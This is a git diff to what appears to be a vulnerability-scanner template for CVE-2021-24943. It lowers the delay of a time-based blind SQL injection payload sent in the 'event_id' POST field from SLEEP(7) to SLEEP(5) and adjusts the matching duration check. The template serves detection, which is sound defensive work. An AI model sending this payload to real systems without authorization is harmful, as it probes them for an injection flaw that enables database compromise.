diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index ca9f2a687d..83f1e2b1ef 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -26,12 +26,12 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(7)))vNpy)&email={{text}}@{{text}}.com + event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com matchers: - type: dsl dsl: - - 'duration>=7' + - 'duration>=5' - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and